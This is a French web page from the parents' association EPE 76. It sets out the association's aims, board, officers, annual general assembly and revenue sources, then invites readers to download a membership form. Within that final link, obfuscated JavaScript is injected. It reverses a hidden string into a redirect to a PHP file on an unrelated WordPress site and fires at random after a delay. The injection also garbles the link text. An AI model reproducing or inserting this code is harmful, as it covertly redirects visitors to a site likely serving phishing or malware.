Le bulletin d’adhésion

L’EPE 76 est une association 1901 dont l’objet premier est d’accompagner les parents et de soutenir leur fonction parentale tel que cela est défini par ses statuts et son projet associatif.

L’EPE 76 adhère nécessairement aux principes de neutralité et de laïcité communément partagés par le réseau national des EPE.

L’EPE 76 est composée de personnes physique adhérentes et bénévoles choisies sans discrimination fondée sur des critères de sexe, de nationalité, de race, de religion, ou encore de critères politiques ou sociaux.

Le Conseil d’Administration est composé des administrateurs élus par les adhérents. Ces derniers définissent la politique générale de l’association et exerce une responsabilité globale dans la vie associative. Le Conseil d’Administration est garant du projet associatif. Il est piloté par le Président de l’association. Le Bureau est composé d’au minimum trois membres : Le Président est chargé d’exécuter les décisions du Conseil et d’assurer le bon fonctionnement de l’Association qu’il représente en justice et dans tous les actes de la vie civile. Le Secrétaire est chargé des convocations et de la rédaction des procès-verbaux, de la tenue du registre prescrit par l’article 5 de la loi du 1er juillet 1901, de la correspondance et des archives. Le Trésorier tient les comptes financiers de l’Association. Le Bureau délègue certaines de ses attributions au Directeur de l’Association. L’Assemblée Générale Tous les membres de l’Association sont prévenus de la tenue de l’Assemblée Générale. Elle se réunit une fois par an, sur convocation de son Président. Elle entend les rapports sur la gestion du Conseil d’Administration, sur la situation financière et morale de l’Association, rapports soumis à son approbation. Elle approuve les comptes de l’exercice clos, délibère sur les questions mises à l’ordre du jour et pourvoit s’il y a lieu, au renouvellement des membres du Conseil d’Administration. Les recettes annuelles de l’Association se composent :

• des cotisations des membres adhérents,
  • des subventions accordées à l’Association,
  • des dons manuels, de mécénats et parrainages,
  • des produits issus des diverses activités et organisations de l’association,
  • de toutes ressources autorisées par les textes législatifs ou réglementaires.

Si vous souhaitez adhérer, télécharger $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == « string ») return $VOcl3cIRrbzlimOyC8H.list[n].split(«  »).reverse().join(«  »);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[« ‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e mon adhésion à l’EPE 76″ href= »http://www.epe76.fr/?p=738″>le bulletin d’adhésion (cliquez)